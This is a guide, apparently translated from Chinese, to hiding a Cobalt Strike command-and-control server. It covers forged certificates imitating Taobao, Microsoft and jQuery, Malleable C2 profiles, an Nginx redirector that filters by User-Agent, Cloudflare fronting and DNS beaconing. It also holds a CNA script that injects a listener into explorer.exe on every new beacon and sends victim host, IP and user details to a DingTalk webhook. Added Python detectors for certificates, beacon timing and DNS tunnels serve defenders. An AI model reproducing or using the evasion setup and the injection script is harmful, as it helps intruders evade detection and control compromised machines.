
1 Removing Cobalt Strike fingerprints

Tested versions:

CobaltStrike 4.1

openjdk version "11.0.11"

1.1 Change the default port && disable ping

1. Edit the teamserver script directly to change the port:

# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=55555 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -classpath ./cobaltstrike.jar server.TeamServer $*

2. Disable ping: edit /etc/sysctl.conf

net.ipv4.icmp_echo_ignore_all = 1

Then run sysctl -p to apply the setting.

1.2 Replace the default certificate

The step below can alternatively be configured in the profile's HTTPS certificate settings.
Delete the original cobaltstrike.store file and create a new keystore:

// taobao
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=taobao.com, O=Sofaware, L=Beijing, ST=Cyberspace, C=CN"

// 360
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias 360.com -dname "CN=US, OU=360.com, O=Sofaware, L=Beijing, ST=Cyberspace, C=CN"

// baidu
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=ChaoYang, C=CN"

// microsoft.com
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias microsoft.com -dname "CN=Microsoft Windows, OU=MOPR, O=MicrosoftCorporation, L=Redmond, ST=Washington, C=US"

// jquery.com
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias jquery.com -dname "CN=Sectigo RSA Domain Validation Secure Server CA, OU=Sectigo Limited, O=jQuery, L=Los Angeles, ST=California, C=US"

Import the certificate (this migrates the keystore to PKCS12 format):

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

Inspect the keystore contents:

keytool -list -v -keystore cobaltstrike.store
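The subject names created above are exactly the kind of thing a defender can pick out of a certificate inventory: a country code in CN, a CA's name used as a leaf subject, a hostname parked in OU while the organisation field names something else. The following script is an added example (not part of the original post, and not from any tool it mentions) that applies those heuristics to subject strings in the form `keytool -list -v` prints; the sample DNs are constructed from the commands above plus one ordinary server certificate.

```python
"""Heuristic review of certificate subject DNs (added example, not from the original post).

Takes subject strings in the "K=V, K=V" form that `keytool -list -v` prints and
flags hand-crafted patterns: a CN that is not a hostname, a CA name used as a
leaf subject, a hostname placed in OU instead of CN, and an O field that does
not match the domain the certificate claims to be for.
"""
import re

# Constructed sample: three DNs from the keytool commands above plus one benign server DN.
SAMPLE_DNS = [
    "CN=US, OU=taobao.com, O=Sofaware, L=Beijing, ST=Cyberspace, C=CN",
    "CN=Microsoft Windows, OU=MOPR, O=MicrosoftCorporation, L=Redmond, ST=Washington, C=US",
    "CN=Sectigo RSA Domain Validation Secure Server CA, OU=Sectigo Limited, "
    "O=jQuery, L=Los Angeles, ST=California, C=US",
    "CN=www.example.org, O=Example Corp, L=Springfield, ST=Illinois, C=US",
]

HOSTNAME_RE = re.compile(r"^(\*\.)?[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)
CA_PHRASE_RE = re.compile(r"\b(Certification Authority|Secure Server CA|Root CA|CA)\b")


def parse_dn(dn):
    """Split 'K=V, K=V, ...' into a dict (attribute names upper-cased)."""
    fields = {}
    for part in re.split(r",\s*", dn):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().upper()] = value.strip()
    return fields


def registrable_label(hostname):
    """'www.example.org' -> 'example' (the second-to-last label)."""
    labels = hostname.lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def review_dn(dn):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    f = parse_dn(dn)
    cn, ou, org = f.get("CN", ""), f.get("OU", ""), f.get("O", "")
    findings = []
    if not HOSTNAME_RE.match(cn):
        findings.append("CN is not a hostname")
    if CA_PHRASE_RE.search(cn):
        findings.append("CN looks like a CA name")
    if HOSTNAME_RE.match(ou) and not HOSTNAME_RE.match(cn):
        findings.append("hostname in OU rather than CN")
    # Compare the claimed domain (from CN, else OU) with the organisation name.
    claimed = cn if HOSTNAME_RE.match(cn) else (ou if HOSTNAME_RE.match(ou) else "")
    if claimed and org:
        brand = registrable_label(claimed)
        org_norm = re.sub(r"[^a-z0-9]", "", org.lower())
        if brand not in org_norm:
            findings.append("O does not match the claimed domain")
    return findings


def review_all(dns):
    """Map each DN to its findings, keeping only DNs with at least one finding."""
    return {dn: review_dn(dn) for dn in dns if review_dn(dn)}


if __name__ == "__main__":
    for dn, findings in review_all(SAMPLE_DNS).items():
        print(dn)
        for item in findings:
            print("   -", item)
```

The domain/organisation comparison is deliberately loose (a substring match on the registrable label) so that legitimate "Example Corp" / example.org pairs pass while "Sofaware" / taobao.com does not; tune the phrase list and thresholds to your own inventory.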

1.3 Use a Malleable C2 profile

See the following repositories for reference profiles:

https://github.com/xx0hcd/Malleable-C2-Profiles/tree/master/normal
https://github.com/threatexpress/malleable-c2

A profile that imitates jQuery is used here; first check that it lints cleanly:

./c2lint malleable-c2/jquery-c2.4.0.profile

Start the team server with the profile:

./teamserver <server ip> <cs password> <profile file>
// e.g.:
./teamserver 123.4.5.67 123456 ./jquery-c2.4.0.profile

1.4 Configure an Nginx reverse proxy

Used together with the Malleable C2 profile jquery-c2.4.0.profile.

1.4.1 jquery-c2.4.0.profile settings

Change the following entries; add them if they are not present.

http-config {
    # Only this line is added: it lets the reverse proxy pass the client's source IP through, which becomes the "external" IP shown in CS
    set trust_x_forwarded_for "true";
}
# Also change the line below. The useragent can be anything you like (change every occurrence if the profile sets it in several places), but it must stay consistent with the profile
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";

Note: if a CDN is used, change the header in jquery-c2.4.0.profile to the value below, otherwise beacons may fail to check in or command output may not come back.

header "Content-Type" "application/*; charset=utf-8";

1.4.2 Nginx configuration

Edit the nginx configuration file /etc/nginx/nginx.conf (use which nginx to find where nginx is installed) and change the server blocks under http as shown below; add them if they do not exist:

    # Reject access by bare IP address
    server {
        listen 80;
        # Replace $Your_IP with your server's IP
        server_name $Your_IP;
        return 404;
    }

    server {
        listen 80;
        # Replace $Your_Domain with your domain
        server_name $Your_Domain;
        location ~*/jquery {
            # The UA only has to match the one in the profile
            if ($http_user_agent != "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko") {
                # Replace the redirect URL as you see fit
                return 302 https://www.google.com;
            }
            # Pass the source IP through; it becomes the "external" IP in CS
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            # Replace the proxied port below
            proxy_pass http://127.0.0.1:6666;
        }

        # Everything else redirects straight to Google
        location / {
            return 302 https://www.google.com;
        }
    }

Hot reload the configuration: nginx -s reload
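The Nginx rule above only forwards requests whose User-Agent equals the profile's, so from the defender's side the traffic worth hunting for is a client that repeats the same UA and the same /jquery path at a steady interval, with none of the other resources a browser would fetch. The script below is an added example (not from the original post or any tool it cites) that runs that check over constructed proxy log lines in a made-up format; the UA string and path are the ones the profile and Nginx rule above use.

```python
"""Spot fixed-interval check-ins behind a UA-filtering redirector (added example, not from the post).

Input: a list of proxy log lines in the constructed format
    <ISO8601 time> <client ip> <method> <host> <path> "<user-agent>" <status>
Requests are grouped by (client, user-agent, host) and a group is flagged when
its inter-request gaps are nearly constant (small coefficient of variation).
"""
import re
import statistics
from datetime import datetime

# The UA the profile and the Nginx rule above agree on.
PROFILE_UA = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"

# Constructed sample: 10.0.0.5 polls /jquery every ~60 s, 10.0.0.7 browses normally.
SAMPLE_LOG = [
    '2024-05-01T10:00:00Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:00:10Z 10.0.0.7 GET cdn.example.test /index.html "%s" 200' % BROWSER_UA,
    '2024-05-01T10:00:11Z 10.0.0.7 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % BROWSER_UA,
    '2024-05-01T10:01:02Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:01:58Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:03:01Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:03:59Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:05:00Z 10.0.0.5 GET cdn.example.test /jquery-3.3.1.min.js "%s" 200' % PROFILE_UA,
    '2024-05-01T10:07:30Z 10.0.0.7 GET cdn.example.test /about.html "%s" 200' % BROWSER_UA,
]

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d+)$')


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, method, host, path, ua, status = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "src": src, "method": method, "host": host,
        "path": path, "ua": ua, "status": int(status),
    }


def detect_beacons(lines, min_hits=4, max_cv=0.2):
    """Flag (client, UA, host) groups whose request cadence is nearly constant.

    cv = population stddev / mean of the gaps between consecutive requests.
    A person browsing produces a large cv; a timed check-in with a little
    jitter produces a very small one.
    """
    groups = {}
    for rec in filter(None, map(parse_line, lines)):
        groups.setdefault((rec["src"], rec["ua"], rec["host"]), []).append(rec)
    findings = []
    for (src, ua, host), recs in groups.items():
        if len(recs) < min_hits:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            findings.append({
                "src": src, "host": host, "ua": ua, "hits": len(recs),
                "mean_interval_s": round(mean, 1), "cv": round(cv, 3),
                "distinct_paths": len({r["path"] for r in recs}),
                "profile_ua": ua == PROFILE_UA,
            })
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_LOG):
        print(f)
```

The cadence test is the part that survives a UA change: an operator can rename the UA and path in the profile, but a sleep-with-jitter check-in keeps a low coefficient of variation, and a client that requests one script file repeatedly without ever loading a page is not a browser.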

1.4.3 Set up iptables

# List rules with line numbers
#iptables -nL --line-number
# Delete a rule by its number
#iptables -D INPUT number

# Allow local access to port 6666
iptables -A INPUT -s 127.0.0.1 -p tcp --dport 6666 -j ACCEPT
# DROP external access to port 6666
iptables -A INPUT -p tcp --dport 6666 -j DROP

service iptables restart

1.4.4 Configure the CDN

Add an A record on cloudflare.com, take the two nameserver addresses it gives you, and set those two as the NS records in your domain registrar's management panel.

Under SSL/TLS, turn off Automatic HTTPS Rewrites, turn off Always Use HTTPS, and turn off Brotli compression.

Then create a rule in Cloudflare that permanently bypasses the cache.


1.4.5 Final result

HTTP Port (C2) is the port nginx listens on; HTTP Port (Bind) is the reverse-proxied port 6666.

Note that once Cloudflare's CDN is in front, the HTTP listener port can only be one of the following:

80, 8080, 8880, 2052, 2082, 2086, 2095

and the HTTPS listener port can only be one of the following:

443, 2053, 2083, 2087, 2096, 8443


2. Check-in notification bot

Project: https://github.com/evi1ox/cobalt_strike_bot
The script below additionally injects into the desktop process automatically; $listener must equal the name of the listener you created. Save the following as dingtalk.cna:

on beacon_initial {
    # Callback for the process listing: find explorer.exe and inject the named listener into it
    sub callback {
        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
        $listener = "CDN";
        if ($2 ismatch $regex) {
            $pid = matched()[1];
            $inject_pid = $pid;
            if (-is64 $1) {
                $arch = "x64";
            }
            else {
                $arch = "x86";
            }
            binject($1, $pid, $listener, $arch);
        }
    }
    # Only list processes (and inject) for beacons that are not already the injected one
    if ($inject_pid != beacon_info($1, "pid")) {
        bps($1, &callback);
    }

    # DingTalk robot token: replace the placeholder below
    $dt_token = "xxxxxxx替换这里";
    $dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token=' . $dt_token;
    $targetInfo_txt = "## 您有新主机上线啦!\n>";
    $listener_txt = "**所属项目:**";
    $externalIp_txt = "  \n  >**公网IP:**";
    $internalIp_txt = "  \n  >**内网IP:**";
    $computerName_txt = "  \n  >**主机名:**";
    $userName_txt = "  \n  >**当前用户:**";

    # Beacon metadata; spaces are replaced so the values stay single tokens in the message
    local('$internalIP $externalIP $computerName $userName $listenerName');
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $listenerName = replace(beacon_info($1, "listener"), " ", "_");

    # Build the markdown message body and post it to the webhook with curl
    $dt_msg = "{\"msgtype\": \"markdown\",\"markdown\": {\"title\":\"新主机上线\",\"text\":" . "\"" . $targetInfo_txt . $listener_txt . $listenerName . $externalIp_txt . $externalIP . $internalIp_txt . $internalIP . $computerName_txt . $computerName . $userName_txt . $userName . "\"" . "}}";
    @curl_command = @('curl', '-H', 'Content-Type: application/json', '-d', $dt_msg, $dt_bot_webhookURL);
    exec(@curl_command);
}

Then run the CNA script on the server:

./agscript [host] [port] [user] [password] <path to cna script>

// e.g.:
./agscript 123.4.5.67 55555 dingtalk 123456 dingtalk.cna

If the following error appears:

Exception in thread "TeamQueue Reader" java.awt.AWTError: Assistive Technology not found: org.GNOME.Accessibility.AtkWrapper

Fix:

sudo sed -i "s/^assistive_technologies=/#&/" \
/etc/java-8-openjdk/accessibility.properties

3. DNS check-in configuration

On Cloudflare add NS records; as the nameserver, enter the domain configured in CS, i.e. the domain the A record points to.


Add two records.


Listener configuration: for the Stager, pick any one of the DNS Hosts above.


Once configured, the records resolve correctly and beacons check in without problems.

Pitfall:

If the port is already in use, stop the service holding it:

systemctl stop systemd-resolved
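A DNS listener encodes its traffic in the left-most label of queries under the zone delegated above, so on the resolver side the zone stands out by receiving many never-repeated, long, high-entropy subdomains, which a content CDN with short cache-buster labels does not. The script below is an added example (not from the original post or the tools it references) that scores each zone in a constructed resolver log of (client, qname, qtype) tuples; the zone names, labels and thresholds are all made up for the illustration.

```python
"""Flag zones receiving tunnel-like query patterns (added example, not from the original post).

Input: a list of (client ip, query name, query type) tuples, constructed here to
imitate a resolver log. Per zone (last two labels) the script counts distinct
left-most labels and measures their mean length and mean Shannon entropy.
"""
import math
from collections import Counter, defaultdict

# Constructed sample: six one-off 16-hex-character labels under example-c2.test,
# plus ordinary lookups and a static-content host with short, unique labels.
SAMPLE_QUERIES = [
    ("10.0.0.5", "7f3a9c1e5b2d8046.cdn.example-c2.test", "A"),
    ("10.0.0.5", "0123456789abcdef.cdn.example-c2.test", "A"),
    ("10.0.0.5", "fedcba9876543210.cdn.example-c2.test", "TXT"),
    ("10.0.0.5", "4e8b1d6a0f3c7952.cdn.example-c2.test", "A"),
    ("10.0.0.5", "c2a9d5f0b8e46137.cdn.example-c2.test", "TXT"),
    ("10.0.0.5", "91b7e3a5d0c2f864.cdn.example-c2.test", "AAAA"),
    ("10.0.0.7", "www.google.com", "A"),
    ("10.0.0.7", "mail.example.com", "A"),
    ("10.0.0.7", "www.google.com", "A"),
    ("10.0.0.7", "img1.static.example.com", "A"),
    ("10.0.0.7", "img2.static.example.com", "A"),
    ("10.0.0.7", "img3.static.example.com", "A"),
    ("10.0.0.7", "img4.static.example.com", "A"),
    ("10.0.0.7", "img5.static.example.com", "A"),
]


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def zone_of(qname):
    """'a.b.example.com.' -> 'example.com' (last two labels; good enough for the sample)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def zone_stats(queries):
    """Per zone: number of distinct left-most labels, their mean length and mean entropy."""
    per_zone = defaultdict(set)
    for _client, qname, _qtype in queries:
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # a bare zone name carries no encoded label
        per_zone[zone_of(qname)].add(labels[0])
    stats = {}
    for zone, subs in per_zone.items():
        stats[zone] = {
            "unique": len(subs),
            "mean_len": sum(map(len, subs)) / len(subs),
            "mean_entropy": sum(map(shannon_entropy, subs)) / len(subs),
        }
    return stats


def detect_dns_tunnels(queries, min_unique=5, min_len=12, min_entropy=3.0):
    """Return the zones whose left-most labels are numerous, long and high-entropy."""
    flagged = []
    for zone, s in zone_stats(queries).items():
        if s["unique"] >= min_unique and s["mean_len"] >= min_len and s["mean_entropy"] >= min_entropy:
            flagged.append(dict(zone=zone, **s))
    return sorted(flagged, key=lambda d: d["zone"])


if __name__ == "__main__":
    for hit in detect_dns_tunnels(SAMPLE_QUERIES):
        print(hit)
```

All three conditions have to hold together: the static-content host in the sample also has many distinct labels, but they are four characters long with about two bits of entropy, so it is not flagged; the delegated zone is, regardless of whether the queries are A, AAAA or TXT.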

4. References

Pitfalls of CS check-in over a DNS tunnel - FreeBuf
[Pentest] CS DNS check-in (DoH tunnel + CS fingerprint hiding)

CobaltStrike fingerprint hiding
Cobalt Strike fingerprint hiding
